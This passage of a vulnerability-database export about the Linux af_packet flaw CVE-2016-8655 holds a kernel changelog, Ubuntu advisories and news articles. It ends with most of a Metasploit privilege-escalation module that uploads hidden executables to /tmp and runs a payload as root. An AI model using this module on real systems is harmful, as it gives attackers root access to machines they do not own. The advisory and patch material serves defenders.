(bsc#998054).\n - Drop kernel-obs-qa-xen unconditionally (bsc#1010040) The IBS cannot\n build it, even if there is a xen-capable kernel-obs-build.\n - edac/mce_amd: Add missing SMCA error descriptions (fate#320474,\n bsc#1013700).\n - edac/mce_amd: Use SMCA prefix for 
error descriptions arrays\n (fate#320474, bsc#1013700).\n - efi/runtime-wrappers: Add {__,}efi_call_virt() templates (bsc#1005745).\n - efi/runtime-wrappers: Detect firmware IRQ flag corruption (bsc#1005745).\n - efi/runtime-wrappers: Remove redundant #ifdefs (bsc#1005745).\n - ext4: fix data exposure after a crash (bsc#1012829).\n - fs, block: force direct-I/O for dax-enabled block devices (bsc#1012992).\n - fs/cifs: cifs_get_root shouldn't use path with tree name (bsc#963655,\n bsc#979681).\n - fs/cifs: Compare prepaths when comparing superblocks (bsc#799133).\n - fs/cifs: Fix memory leaks in cifs_do_mount() (bsc#799133).\n - fs/cifs: Move check for prefix path to within cifs_get_root()\n (bsc#799133).\n - fuse: Fixup buggy conflict resolution in\n patches.fixes/fuse-Propagate-dentry-down-to-inode_change_ok.patch.\n - genirq: Add untracked irq handler (bsc#1006827).\n - genirq: Use a common macro to go through the actions list (bsc#1006827).\n - gre: Disable segmentation offloads w/ CSUM and we are encapsulated via\n FOU (bsc#1001486).\n - gro: Allow tunnel stacking in the case of FOU/GUE (bsc#1001486).\n - hpsa: fallback to use legacy REPORT PHYS command (bsc#1006175).\n - hpsa: use bus '3' for legacy HBA devices (bsc#1010665).\n - hpsa: use correct DID_NO_CONNECT hostbyte (bsc#1010665).\n - hv: do not lose pending heartbeat vmbus packets (bnc#1006918).\n - i2c: designware-baytrail: Work around Cherry Trail semaphore errors\n (bsc#1011913).\n - i2c: xgene: Avoid dma_buffer overrun (bsc#1006576).\n - i40e: fix an uninitialized variable bug (bsc#969476 FATE#319648).\n - i40e: fix broken i40e_config_rss_aq function (bsc#969476 FATE#319648\n bsc#969477 FATE#319816).\n - i40e: Remove redundant memset (bsc#969476 FATE#319648 bsc#969477\n FATE#319816).\n - i810: Enable Intel i810 audio driver used in OpenQA VMs.\n - Import kabi files for x86_64/default from 4.4.27-2.1\n - iommu/arm-smmu: Add support for 16 bit VMID (fate#319978).\n - iommu/arm-smmu: Workaround for 
ThunderX erratum #27704 (fate#319978).\n - ipmi_si: create hardware-independent softdep for ipmi_devintf\n (bsc#1009062).\n - kABI: protect struct mmc_packed (kabi).\n - kABI: protect struct mmc_packed (kabi).\n - kABI: reintroduce sk_filter (kabi).\n - kABI: reintroduce strtobool (kabi).\n - kABI: reintroduce strtobool (kabi).\n - kABI: restore ip_cmsg_recv_offset parameters (kabi).\n - kabi/severities: Ignore kABI for asoc Intel SST drivers (bsc#1010690)\n These drivers are self-contained, not for 3rd party drivers.\n - kernel-module-subpackage: Properly quote flavor in expressions That\n fixes a parse error if the flavor starts with a digit or contains other\n non-alphabetic characters.\n - kgr: ignore zombie tasks during the patching (bnc#1008979).\n - md/raid1: fix: IO can block resync indefinitely (bsc#1001310).\n - mm: do not use radix tree writeback tags for pages in swap cache\n (bnc#971975 VM performance -- swap).\n - mm/filemap: generic_file_read_iter(): check for zero reads\n unconditionally (bnc#1007955).\n - mm/mprotect.c: do not touch single threaded PTEs which are on the right\n node (bnc#971975 VM performance -- numa balancing).\n - net/mlx5: Add ConnectX-5 PCIe 4.0 to list of supported devices\n (bsc#1006809).\n - net: sctp, forbid negative length (bnc#1005921).\n - netvsc: fix incorrect receive checksum offloading (bnc#1006915).\n - overlayfs: allow writing on read-only btrfs subvolumes (bsc#1010158)\n - pci/ACPI: Allow all PCIe services on non-ACPI host bridges (bsc#1006827).\n - pci: Allow additional bus numbers for hotplug bridges (bsc#1006827).\n - pci: correctly cast mem_base in pci_read_bridge_mmio_pref()\n (bsc#1001888).\n - pci: pciehp: Allow exclusive userspace control of indicators\n (bsc#1006827).\n - pci: Remove return values from pcie_port_platform_notify() and relatives\n (bsc#1006827).\n - perf/x86: Add perf support for AMD family-17h processors (fate#320473).\n - powerpc/pseries: Use H_CLEAR_HPT to clear MMU hash table during 
kexec\n (bsc#1003813).\n - proc: much faster /proc/vmstat (bnc#971975 VM performance -- vmstat).\n - qede: Correctly map aggregation replacement pages (bsc#966318\n FATE#320158 bsc#966316 FATE#320159).\n - qed: FLR of active VFs might lead to FW assert (bsc#966318 FATE#320158\n bsc#966316 FATE#320159).\n - Reformat spec files according to the format_spec_file osc helper\n - Replace\n patches.kabi/kabi-hide-new-member-recursion_counter-in-struct-sk_.patch\n by patches.kabi/kabi-hide-bsc-1001486-changes-in-struct-napi_gro_cb.patch\n - Revert "ACPI / LPSS: allow to use specific PM domain during ->probe()"\n (bsc#1005917).\n - Revert "fix minor infoleak in get_user_ex()" (p.k.o).\n - REVERT fs/cifs: fix wrongly prefixed path to root (bsc#963655,\n bsc#979681)\n - Revert "x86/mm: Expand the exception table logic to allow new handling\n options" (p.k.o).\n - rpm/config.sh: Build against SP2 in the OBS as well\n - rpm/constraints.in: increase disk for kernel-syzkaller The\n kernel-syzkaller build now consumes around 30G. This causes headache in\n factory where the package rebuilds over and over. 
Require 35G disk size\n to successfully build the flavor.\n - rpm/kernel-binary.spec.in: Build the -base package unconditionally\n (bsc#1000118)\n - rpm/kernel-binary.spec.in: Do not create KMPs with CONFIG_MODULES=n\n - rpm/kernel-binary.spec.in: Only build -base and -extra with\n CONFIG_MODULES (bsc#1000118)\n - rpm/kernel-binary.spec.in: Simplify debug info switch Any\n CONFIG_DEBUG_INFO sub-options are answered in the configs nowadays.\n - rpm/kernel-spec-macros: Ignore too high rebuild counter (bsc#1012060)\n - rpm/mkspec: Read a default release string from rpm/config.sh (bsc997059)\n - rpm/package-descriptions: Add 64kb kernel flavor description\n - rpm/package-descriptions: add kernel-syzkaller\n - rpm/package-descriptions: pv has been merged into -default (fate#315712)\n - rpm/package-descriptions: the flavor is 64kb, not 64k\n - sched/core: Optimize __schedule() (bnc#978907 Scheduler performance --\n context switch).\n - sched/fair: Optimize find_idlest_cpu() when there is no choice\n (bnc#978907 Scheduler performance -- idle search).\n - supported.conf: Add overlay.ko to -base (fate#321903) Also, delete the\n stale entry for the old overlayfs.\n - supported.conf: Mark vmx-crypto as supported (fate#319564)\n - tg3: Avoid NULL pointer dereference in tg3_io_error_detected()\n (bsc#963609 FATE#320143).\n - usbhid: add ATEN CS962 to list of quirky devices (bsc#1007615).\n - Whitelist KVM KABI changes resulting from adding a hcall. caused by\n 5246adec59458b5d325b8e1462ea9ef3ead7f6ae powerpc/pseries: Use\n H_CLEAR_HPT to clear MMU hash table during kexec No problem is expected\n as result of changing KVM KABI so whitelisting for now. If we get some\n additional input from IBM we can back out the patch.\n - writeback: initialize inode members that track writeback history\n (bsc#1012829).\n - x86/apic: Order irq_enter/exit() calls correctly vs. 
ack_APIC_irq()\n (bsc#1013479).\n - x86/efi: Enable runtime call flag checking (bsc#1005745).\n - x86/efi: Move to generic {__,}efi_call_virt() (bsc#1005745).\n - x86/mce/AMD, EDAC/mce_amd: Define and use tables for known SMCA IP types\n (fate#320474, bsc#1013700). Exclude removed symbols from kABI check.\n They're AMD Zen relevant only and completely useless to other modules -\n only edac_mce_amd.ko.\n - x86/mce/AMD: Increase size of the bank_map type (fate#320474,\n bsc#1013700).\n - x86/mce/AMD: Read MSRs on the CPU allocating the threshold blocks\n (fate#320474, bsc#1013700).\n - x86/mce/AMD: Update sysfs bank names for SMCA systems (fate#320474,\n bsc#1013700).\n - x86/mce/AMD: Use msr_ops.misc() in allocate_threshold_blocks()\n (fate#320474, bsc#1013700).\n - x86/PCI: VMD: Attach VMD resources to parent domain's resource tree\n (bsc#1006827).\n - x86/PCI: VMD: Document code for maintainability (bsc#1006827).\n - x86/PCI: VMD: Fix infinite loop executing irq's (bsc#1006827).\n - x86/PCI: VMD: Initialize list item in IRQ disable (bsc#1006827).\n - x86/PCI: VMD: Request userspace control of PCIe hotplug indicators\n (bsc#1006827).\n - x86/PCI: VMD: Select device dma ops to override (bsc#1006827).\n - x86/PCI: VMD: Separate MSI and MSI-X vector sharing (bsc#1006827).\n - x86/PCI: VMD: Set bus resource start to 0 (bsc#1006827).\n - x86/PCI: VMD: Use lock save/restore in interrupt enable path\n (bsc#1006827).\n - x86/PCI/VMD: Use untracked irq handler (bsc#1006827).\n - x86/PCI: VMD: Use x86_vector_domain as parent domain (bsc#1006827).\n - xen/gntdev: Use VM_MIXEDMAP instead of VM_IO to avoid NUMA balancing\n (bnc#1005169).\n - zram: Fix unbalanced idr management at hot removal (bsc#1010970).\n\n", "modified": "2016-12-08T13:08:00", "published": "2016-12-08T13:08:00", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00026.html", "id": "OPENSUSE-SU-2016:3050-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", 
"cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:36:59", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Philip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "id": "USN-3151-3", "href": "https://ubuntu.com/security/notices/USN-3151-3", "title": "Linux kernel (Qualcomm Snapdragon) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:35:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Philip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "id": "USN-3151-4", "href": "https://ubuntu.com/security/notices/USN-3151-4", "title": "Linux kernel (Raspberry Pi 2) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:44:48", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Philip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. 
A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "id": "USN-3150-1", "href": "https://ubuntu.com/security/notices/USN-3150-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T01:34:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Philip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 6, "modified": "2016-12-06T00:00:00", "published": "2016-12-06T00:00:00", "id": "USN-3150-2", "href": "https://ubuntu.com/security/notices/USN-3150-2", "title": "Linux kernel (OMAP4) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:30:16", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Philip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "id": "USN-3152-1", "href": "https://ubuntu.com/security/notices/USN-3152-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:41:49", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Philip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. 
A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "id": "USN-3151-1", "href": "https://ubuntu.com/security/notices/USN-3151-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:44:38", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "USN-3151-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nPhilip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "id": "USN-3151-2", "href": "https://ubuntu.com/security/notices/USN-3151-2", "title": "Linux kernel (Xenial HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:36:02", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "USN-3149-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 LTS.\n\nPhilip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. 
A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "id": "USN-3149-2", "href": "https://ubuntu.com/security/notices/USN-3149-2", "title": "Linux kernel (Trusty HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:37:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Philip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "id": "USN-3149-1", "href": "https://ubuntu.com/security/notices/USN-3149-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:29:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Philip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. 
A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-06T00:00:00", "published": "2016-12-06T00:00:00", "id": "USN-3152-2", "href": "https://ubuntu.com/security/notices/USN-3152-2", "title": "Linux kernel (Raspberry Pi 2) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:58", "bulletinFamily": "info", "cvelist": ["CVE-2016-8655"], "description": "[](<https://3.bp.blogspot.com/-SSKEkSYFPlI/WEg1PB5oNjI/AAAAAAAAqe0/GArieXp2QPgbMiiIN0hTVEp7YmTypEnGQCLcB/s1600/linux-kernel-local-root-exploit.png>)\n\nA 5-year-old serious privilege-escalation vulnerability has been discovered in Linux kernel that affects almost every distro of the Linux operating system, including Redhat, and Ubuntu. \n \nOver a month back, a nine-year-old privilege-escalation vulnerability, dubbed \"[Dirty COW](<https://thehackernews.com/2016/10/linux-kernel-exploit.html>),\" was discovered in the Linux kernel that affected every distro of the open-source operating system, including Red Hat, Debian, and Ubuntu. \n \nNow, another Linux kernel vulnerability ([CVE-2016-8655](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8655>)) that dates back to 2011 [disclosed](<http://seclists.org/oss-sec/2016/q4/607>) today could allow an unprivileged local user to gain root privileges by exploiting a race condition in the af_packet implementation in the Linux kernel. \n \nPhilip Pettersson, the researcher who discovered the flaw, was able to create an [exploit to gain a root shell](<https://www.exploit-db.com/exploits/40871/>) on an Ubuntu 16.04 LTS system (Linux Kernel 4.4) and also defeated SMEP/SMAP (Supervisor Mode Execution Prevention/Supervisor Mode Access Prevention) protection to gain kernel code execution abilities. 
\n \nIn other words, a local unprivileged attacker can use this exploit to cause a denial of service (crashing server) or run arbitrary malicious code with administrative privileges on the targeted system. \n\n\n> \"_A race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets implementation in the Linux kernel networking subsystem handled synchronization while creating the TPACKET_V3 ring buffer_,\" Red Hat [security advisory](<https://access.redhat.com/security/cve/cve-2016-8655>) explains. \n\n> \"_A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system._\"\n\nThis threat creates a potential danger for service providers to have their servers crashed or hacked through this Linux kernel vulnerability. \n \n_\"On Android, processes with gid=3004/AID_NET_RAW are able to create AF_PACKET sockets (mediaserver) and can trigger the bug,\" _Pettersson explains. \n \nThe vulnerability was patched in the mainline kernel last week, so users are advised to update their Linux distro as soon as possible.\n", "modified": "2016-12-07T16:14:04", "published": "2016-12-07T04:41:00", "id": "THN:04F5FC12455795F06BC21F5C803FA77E", "href": "https://thehackernews.com/2016/12/linux-kernel-local-root-exploit.html", "type": "thn", "title": "5-Year-Old Linux Kernel Local Privilege Escalation Flaw Discovered", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:24", "bulletinFamily": "info", "cvelist": ["CVE-2016-8655", "CVE-2017-6074"], "description": "[](<https://3.bp.blogspot.com/-MlWxlllb_uQ/WK3ToXZjodI/AAAAAAAArdY/TIkjV9A0VUc-XH40OE8oYELAR8hxzvgLwCLcB/s1600/linux-kernel-local-root-exploit.png>)\n\nAnother privilege-escalation vulnerability has been discovered in Linux kernel that dates back to 2005 and affects major distro of the Linux operating system, including Redhat, Debian, 
OpenSUSE, and Ubuntu.\n\n \nOver a decade old Linux Kernel bug ([CVE-2017-6074](<https://www.suse.com/support/kb/doc?id=7018645>)) has been discovered by security researcher Andrey Konovalov in the DCCP (Datagram Congestion Control Protocol) implementation using [Syzkaller](<https://github.com/google/syzkaller>), a kernel fuzzing tool released by Google. \n \nThe vulnerability is a use-after-free flaw in the way the Linux kernel's \"DCCP protocol implementation freed SKB (socket buffer) resources for a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO option is set on the socket.\" \n \nThe DCCP double-free vulnerability could allow a local unprivileged user to alter the Linux kernel memory, enabling them to cause a denial of service (_system crash_) or escalate privileges to gain administrative access on a system. \n\n\n> \"An attacker can control what object that would be and overwrite its content with arbitrary data by using some of the kernel heap spraying techniques. If the overwritten object has any triggerable function pointers, an attacker gets to execute arbitrary code within the kernel,\" full disclosure [mailing list](<http://seclists.org/oss-sec/2017/q1/471>) about the vulnerability reads.\n\nDCCP is a message-oriented transport layer protocol that minimizes the overhead of packet header size or end-node processing as much as possible and provides the establishment, maintenance and teardown of an unreliable packet flow, and the congestion control of that packet flow. \n \nThis vulnerability does not provide any way for an outsider to break into your system in the first place, as it is not a remote code execution (RCE) flaw and require an attacker to have a local account access on the system to exploit the flaw. 
\n \nAlmost two months ago, a similar [privilege-escalation vulnerability](<https://thehackernews.com/2016/12/linux-kernel-local-root-exploit.html>) (CVE-2016-8655) was uncovered in Linux kernel that dated back to 2011 and allowed an unprivileged local user to gain root privileges by exploiting a race condition in the af_packet implementation in the Linux kernel. \n \nThe vulnerability has already been patched in the [mainline kernel](<https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=5edabca9d4cff7f1f2b68f0bac55ef99d9798ba4>). So, if you are an advanced Linux user, apply the patch and rebuild kernel yourself. \n \nOR, you can wait for the next kernel update from your distro provider and apply it as soon as possible.\n", "modified": "2017-02-22T18:08:51", "published": "2017-02-22T07:08:00", "id": "THN:11E7CC33794D9968747131F3F0AE8716", "href": "https://thehackernews.com/2017/02/linux-kernel-local-root.html", "type": "thn", "title": "11-Year Old Linux Kernel Local Privilege Escalation Flaw Discovered", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-05-23T02:47:16", "description": "This Metasploit module exploits a race condition and use-after-free in the packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel to execute code as root (CVE-2016-8655). The bug was initially introduced in 2011 and patched in 2016 in version 4.4.0-53.74, potentially affecting a large number of kernels; however this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as Linux Mint. The target system must have unprivileged user namespaces enabled and two or more CPU cores. Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation may crash the kernel. 
This Metasploit module has been tested successfully on Linux Mint 17.3 (x86_64); Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel versions 4.4.0-45-generic and 4.4.0-51-generic.", "edition": 1, "published": "2018-05-23T00:00:00", "title": "Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2018-05-23T00:00:00", "id": "1337DAY-ID-30429", "href": "https://0day.today/exploit/description/30429", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n \r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n include Msf::Post::Linux::Kernel\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'AF_PACKET chocobo_root Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a race condition and use-after-free in the\r\n packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in\r\n the Linux kernel to execute code as root (CVE-2016-8655).\r\n \r\n The bug was initially introduced in 2011 and patched in 2016 in version\r\n 4.4.0-53.74, potentially affecting a large number of kernels; however\r\n this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\r\n 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as\r\n Linux Mint.\r\n \r\n The target system must have unprivileged user namespaces enabled and\r\n two or more CPU cores.\r\n \r\n Bypasses for SMEP, SMAP and KASLR are included. 
Failed exploitation\r\n may crash the kernel.\r\n \r\n This module has been tested successfully on Linux Mint 17.3 (x86_64);\r\n Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel\r\n versions 4.4.0-45-generic and 4.4.0-51-generic.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'rebel', # Discovery and chocobo_root.c exploit\r\n 'Brendan Coles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Aug 12 2016',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'Privileged' => true,\r\n 'References' =>\r\n [\r\n [ 'AKA', 'chocobo_root.c' ],\r\n [ 'EDB', '40871' ],\r\n [ 'CVE', '2016-8655' ],\r\n [ 'BID', '94692' ],\r\n [ 'URL', 'http://seclists.org/oss-sec/2016/q4/607' ],\r\n [ 'URL', 'http://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ],\r\n [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ],\r\n [ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ],\r\n [ 'URL', 'https://usn.ubuntu.com/3151-1/' ],\r\n [ 'URL', 'https://www.securitytracker.com/id/1037403' ],\r\n [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ]\r\n ],\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]),\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\r\n ]\r\n end\r\n \r\n def timeout\r\n datastore['TIMEOUT'].to_i\r\n end\r\n \r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n \r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n end\r\n \r\n def upload_and_chmodx(path, 
data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n \r\n def upload_and_compile(path, data)\r\n upload \"#{path}.c\", data\r\n \r\n gcc_cmd = \"gcc -o #{path} #{path}.c -lpthread\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n rm_f \"#{path}.c\"\r\n \r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n \r\n cmd_exec \"chmod +x #{path}\"\r\n end\r\n \r\n def exploit_data(file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file\r\n fd = ::File.open path, 'rb'\r\n data = fd.read fd.stat.size\r\n fd.close\r\n data\r\n end\r\n \r\n def live_compile?\r\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\r\n \r\n if has_gcc?\r\n vprint_good 'gcc is installed'\r\n return true\r\n end\r\n \r\n unless datastore['COMPILE'].eql? 'Auto'\r\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\r\n end\r\n end\r\n \r\n def check\r\n version = kernel_release\r\n unless version =~ /^4\\.4\\.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic/\r\n vprint_error \"Linux kernel version #{version} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Linux kernel version #{version} is vulnerable\"\r\n \r\n arch = kernel_hardware\r\n unless arch.include? 
'x86_64'\r\n vprint_error \"System architecture #{arch} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System architecture #{arch} is supported\"\r\n \r\n cores = get_cpu_info[:cores].to_i\r\n min_required_cores = 2\r\n unless cores >= min_required_cores\r\n vprint_error \"System has less than #{min_required_cores} CPU cores\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System has #{cores} CPU cores\"\r\n \r\n unless userns_enabled?\r\n vprint_error 'Unprivileged user namespaces are not permitted'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'Unprivileged user namespaces are permitted'\r\n \r\n CheckCode::Appears\r\n end\r\n \r\n def exploit\r\n if check != CheckCode::Appears\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n \r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n \r\n unless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true'\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n \r\n # Upload exploit executable\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n if live_compile?\r\n vprint_status 'Live compiling exploit on system...'\r\n upload_and_compile executable_path, exploit_data('chocobo_root.c')\r\n else\r\n vprint_status 'Dropping pre-compiled exploit on system...'\r\n upload_and_chmodx executable_path, exploit_data('chocobo_root')\r\n end\r\n \r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n \r\n # Launch exploit\r\n print_status \"Launching exploit (Timeout: #{timeout})...\"\r\n output = cmd_exec \"echo '#{payload_path} & exit' | #{executable_path}\", nil, timeout\r\n output.each_line { |line| vprint_status line.chomp }\r\n print_status \"Cleaning up #{payload_path} and #{executable_path}..\"\r\n rm_f 
